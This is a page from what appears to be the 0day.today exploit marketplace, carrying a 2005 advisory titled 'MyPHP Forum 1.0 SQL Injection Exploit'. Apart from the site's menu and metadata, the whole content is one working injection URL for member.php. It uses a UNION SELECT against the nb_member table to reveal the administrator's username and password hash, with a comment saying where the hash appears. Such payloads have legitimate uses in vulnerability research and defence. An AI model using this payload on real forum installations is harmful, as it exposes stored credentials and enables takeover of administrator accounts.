[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MyPHP Forum 1.0 SQL Injection Exploit

Author
GHC
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-65
Category
web applications
Date add
10-02-2005
Platform
unsorted
=====================================
MyPHP Forum 1.0 SQL Injection Exploit
=====================================



/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1

/* will show administrator's name and password hash (in the "Yahoo" field). */



#  0day.today [2024-12-25]  #